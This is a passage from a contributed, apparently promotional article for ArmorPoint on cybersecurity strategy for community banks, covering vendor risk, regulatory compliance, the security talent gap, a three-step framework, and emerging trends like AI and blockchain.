Effective vendor risk management goes beyond initial security assessments and requires continuous monitoring and evaluation of vendor security practices. Regular security audits of vendors are essential to ensure they adhere to agreed-upon security standards and practices. Integrating vendor risk management into the bank’s overall cybersecurity strategy ensures a unified approach to security, reducing the likelihood of vendor-related security breaches.

4. Regulatory Compliance: Navigating a Complex Landscape

The regulatory landscape for cybersecurity in the financial sector is intricate and constantly evolving. Banks are required to comply with a wide range of international, national, and regional regulations, each with its own set of requirements and penalties for non-compliance. Navigating this complex landscape is challenging, as banks must continually adapt their cybersecurity strategies to meet these evolving requirements.

To effectively navigate this landscape, community banks must develop a deep understanding of relevant regulations, such as the GBLA, PCI DSS, SOX, and more. This involves establishing a dedicated compliance team, or even utilizing a virtual Chief Information Security Officer (vCISO), responsible for staying abreast of regulatory changes and ensuring that the bank’s cybersecurity practices align with these requirements. Regular training and awareness programs for all staff are also crucial to ensure widespread understanding and adherence to compliance requirements.

5. Bridging the Cybersecurity Talent Gap

The cybersecurity talent gap poses a significant challenge for financial institutions. The rapidly evolving nature of cyber threats requires skilled professionals who are up to date with the latest technologies and strategies. However, there is a shortage of such professionals in the market, making it difficult for banks to recruit and retain the talent needed to effectively manage their cybersecurity risks.

Banks must adopt creative solutions to bridge this talent gap. Developing internal training programs can help upskill existing staff, making them capable of handling more complex cybersecurity tasks. Collaborating with educational institutions to develop tailored cybersecurity curriculums can help create a pipeline of skilled professionals. Additionally, leveraging AI and automation for routine security tasks can free up human resources for more complex and strategic cybersecurity challenges, optimizing the use of available talent.

Furthermore, another viable strategy for addressing the talent gap is outsourcing. Financial institutions can consider outsourcing security operations talent, partnering with specialized firms to provide expert cybersecurity services. This approach allows banks to access a pool of seasoned professionals who can monitor, detect, and respond to security threats effectively. Additionally, outsourcing executive-level insights, such as a virtual Chief Information Security Officer (vCISO), can provide strategic guidance and governance to strengthen the bank’s overall cybersecurity posture. By outsourcing specific talent needs, banks can bridge the talent gap more effectively while maintaining a strong focus on cybersecurity excellence.

ArmorPoint has recently released a security maturity self-assessment. Take the 15-question quiz to determine the gaps in your security posture.

Three Steps to Implement a Robust Cybersecurity Framework

An integrated approach to cybersecurity is imperative for effectively managing these diverse challenges. This involves creating a cohesive framework that combines advanced technology solutions, thorough policies and procedures, regular risk assessments, continuous monitoring, and proactive incident response planning.

Step 1: Strategic Alignment and Planning

The cornerstone of a successful cybersecurity program lies in its strategic alignment and planning. This critical first step involves setting clear cybersecurity goals that are closely aligned with the business objectives of the organization. Integration of security controls into the organizational strategy is essential, ensuring every business aspect is underpinned by robust security measures. An effective strategy also includes the creation of a risk prioritization framework, which is instrumental in identifying and focusing on the most critical threats. Furthermore, the development of a security architecture, tailored to the specific needs and risk profile of the organization, is crucial. This architecture needs to be dynamic, evolving in tandem with the changing landscape of cybersecurity threats and business requirements.

Step 2: Risk-Centric Action and Deployment

The second phase of developing a cybersecurity program is centered around risk-centric action and deployment. This involves establishing an efficient team structure, one that is dedicated to the meticulous implementation of the cybersecurity strategy. A key component of this phase is the deployment of the necessary tools and technologies that bring the strategic plan to life. Translating high-level strategies into actionable, practical steps is essential for effective execution. Strategic allocation of resources, especially in areas with higher perceived risks, ensures that critical aspects of the network are prioritized and reinforced. Moreover, the importance of continuous monitoring and management of security systems cannot be overstated, as they are vital for maintaining the efficacy of security measures and for addressing emergent threats swiftly.

Step 3: Continuous Recalibration and Optimization

In the final phase, the focus shifts to the continuous recalibration and optimization of the cybersecurity program. This phase demands maintaining accountability at all organizational levels and enhancing incident response capabilities to ensure swift and effective reactions to threats. Cultivating a culture that is aware of cybersecurity, through the education of employees and stakeholders about security best practices and risks, forms the bedrock of this phase. Regular evaluations and transparent communication of the program’s effectiveness to key stakeholders are crucial for fostering an environment of continuous improvement. The cybersecurity strategies should be under constant review and refinement based on ongoing assessments. This adaptive approach ensures that cybersecurity measures remain both effective and relevant, aligning with the ever-evolving business environment and the shifting landscape of cyber threats.

Preparing for Emerging Trends and Future Threats

The future of cybersecurity in the financial sector is likely to be shaped by emerging technologies and evolving threat landscapes.

AI and Machine Learning in Cybersecurity

The integration of AI and machine learning in cybersecurity tools is set to revolutionize threat detection and response. These technologies can analyze vast amounts of data to identify patterns indicative of cyber threats, offering a level of speed and efficiency unattainable by human analysts alone.

The Role of Blockchain in Enhancing Security

Blockchain technology has the potential to offer enhanced security features for financial transactions and data integrity. Its decentralized and immutable nature makes it an attractive option for securing transaction records and preventing fraud.

Cyber threats are constantly evolving; community banks must stay vigilant and proactive in their cybersecurity efforts. Embracing comprehensive and integrated cybersecurity strategies, focusing on cyber resilience, and preparing for future technological advancements are key to safeguarding against the diverse and sophisticated threats in the cyber landscape. By staying ahead of these challenges, financial institutions can ensure the security and continuity of their operations, maintaining the trust and confidence of their customers.

For more information about how you can enhance the security of your regional financial institution, explore ArmorPoint’s solutions and experience the power of a unified approach to cybersecurity program management.

Resources

1 https://blog.checkpoint.com/security/check-point-research-cyber-attacks-increased-50-year-over-year/

2 https://www.accenture.com/us-en/insights/security/state-cybersecurity

3 https://info.varonis.com/hubfs/docs/research_reports/2021-Financial-Data-Risk-Report.pdf?hsLang=en

4 https://kpmg.com/us/en/articles/2022/cybersecurity.html

5 https://www.ibm.com/reports/data-breach

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter  and LinkedIn to read more exclusive content we post.